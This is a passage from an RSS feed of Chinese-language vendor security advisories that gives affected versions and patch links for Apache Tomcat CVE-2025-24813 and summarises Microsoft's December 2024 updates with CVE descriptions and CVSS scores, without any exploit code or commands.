border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x01 漏洞描述</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;"><br/></span></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><span style="font-size: 14px;">当应用程序启用servlet写入功能（默认情况下禁用）、Tomcat使用基于文件session机制和存储位置（默认路径）、 服务器启用了partial PUT（默认启用）、依赖库存在反序列化利用链时，未授权攻击者可能利用该漏洞造成远程代码执行。</span></p><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 漏洞编号</span></strong></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">CVE-2025-24813</span></section><section style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;text-wrap: wrap;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">0x03 漏洞等级</span></strong><br/></section><h2 style="text-wrap: wrap;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;break-after: auto;background-color: rgb(255, 255, 255);"></h2><hr style="text-wrap: wrap;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">高危</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 受影响版本</span></strong></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="white-space: normal;margin-top: 16px;margin-bottom: 8px;text-align: justify;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">11.0.0-M1 &lt;= Apache Tomcat &lt;= 11.0.2 <br/>10.1.0-M1 &lt;= Apache Tomcat &lt;= 10.1.34 <br/>9.0.0.M1 &lt;= Apache Tomcat &lt;= 9.0.98</span></section><section style="margin-top: 24px;margin-bottom: 0px;letter-spacing: 0.578px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">0x05 修复建议</span></strong></section><h2 style="color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;break-after: auto;background-color: rgb(255, 255, 255);"></h2><hr style="color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;">目前官方已发布安全更新，建议用户尽快升级至最新版本。<br/>下载地址：</span><br/><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><a href="https://tomcat.apache.org/security-11.html" target="_blank">https://tomcat.apache.org/security-11.html</a><br/><a href="https://tomcat.apache.org/security-10.html" target="_blank">https://tomcat.apache.org/security-10.html</a><br/><a href="https://tomcat.apache.org/security-9.html" target="_blank">https://tomcat.apache.org/security-9.html</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x06 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。<br/></p><section style="white-space: normal;margin-bottom: 0px;"><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span><br/></p></section></section></section></section><section style="margin-bottom: 0px;"><section><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-imgfileid="100013023" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-ratio="1" data-imgfileid="100013022" data-type="jpeg" data-w="344" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;">天融信</span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;">阿尔法实验室</span></p></section></section></section><section><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496672">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a6b71bc4&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496672%26idx%3D1%26sn%3D61480ecdb85f33408d2809e9d5d45378%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 11 Mar 2025 20:04:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于微软2024年12月安全更新的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496664&amp;idx=1&amp;sn=61b0c3aaa8d69a3fb1056ffb3f3d3ed4</link>
      <description>2024年12月11日，天融信阿尔法实验室监测到微软官方发布了12月安全更新。此次更新共修复72个漏洞，其中16个严重漏洞、55个重要漏洞、1个中危漏洞。</description>
      <content:encoded><![CDATA[<p>
原创 <span>天融信应急响应</span> <span>2024-12-11 14:09</span> <span style="display: inline-block;">北京</span>
</p>

<p>2024年12月11日，天融信阿尔法实验室监测到微软官方发布了12月安全更新。此次更新共修复72个漏洞，其中16个严重漏洞、55个重要漏洞、1个中危漏洞。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b9f6448d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABcSkgTrIxBsgHiaHKWYIddeKgQ7v38EL68obnaSRJjpxDrSOAf34MkIA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.29259259259259257" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a7b7e105&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABpjDae9Wfv6vs4Tg5bETzto4ibjJCEjTWJm0R7fx5lNS9nlpbHtD3Ziag%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"></span><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">2024年12月11日，天融信阿尔法实验室监测到微软官方发布了12月安全更新。此次更新共修复72个漏洞，其中16个严重漏洞(Critical)、55个重要漏洞(Important)、1个中危漏洞(Moderate)。其中权限提升漏洞27个、远程代码执行漏洞31个、信息泄露漏洞7个、拒绝服务漏洞5个、欺骗漏洞2个。</span></p><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);">本次微软安全更新涉及组件包括：Windows Common Log File System Driver、Microsoft Office SharePoint、Windows Resilient File System (ReFS)、Windows Message Queuing、Windows Cloud Files Mini Filter Driver、Windows LDAP - Lightweight Directory Access Protocol、Windows Routing and Remote Access Service (RRAS)、Windows Remote Desktop、Windows Wireless Wide Area Network Service等多个产品和组件。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);">微软本次修复中，CVE-2024-49138被在野利用。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">重点</span></strong><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);">本次微软更新中重点漏洞的信息如下所示。<br/></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;font-size: 16px;"><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="font-size: 16px;"><strong>在野利用和公开披露漏洞</strong></span></p></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49138：Windows通用日志文件系统驱动本地权限提升漏洞</span></span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞已发现在野利用。此漏洞是Windows通用日志文件系统驱动中的堆溢出漏洞（CWE-122），CVSS3.1评分为7.8/6.8。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 16px;">漏洞利用可能性较大的漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="329" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="65" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-49070</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SharePoint远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.4/6.4</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-49088</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows通用日志文件系统驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-49090</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows通用日志文件系统驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-49093</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Resilient File System(ReFS)本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-49122</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft消息队列(MSMQ)远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.1/7.1</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-49114</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows Cloud Files微过滤器驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49070：Microsoft SharePoint远程代码执行漏洞</span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Microsoft SharePoint中的不受信任数据的反序列化漏洞（CWE-502）。未经身份认证的本地攻击者可以利用此漏洞在目标环境上下文中执行任意代码。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49088、CVE-2024-49090：Windows通用日志文件系统驱动本地权限提升漏洞</span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49088是Windows通用日志文件系统驱动中的缓冲区过度读取漏洞（CWE-126），CVE-2024-49090是该驱动中的不可信指针解引用漏洞（CWE-822）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49093：Windows Resilient File System(ReFS)本地权限提升漏洞</span></span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Windows Resilient File System(ReFS)中的数字类型间的错误转换漏洞（CWE-681）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-49122：Microsoft消息队列(MSMQ)远程代码执行漏洞</span></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">此漏洞是Microsoft消息队列(MSMQ)中的释放后重用漏洞（CWE-416）。未经身份认证的远程攻击者通过向MSMQ服务器发送特制的恶意MSMQ数据包来利用此漏洞，这可能导致在服务器端执行远程代码。成功利用此漏洞需要攻击者赢得竞争条件。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 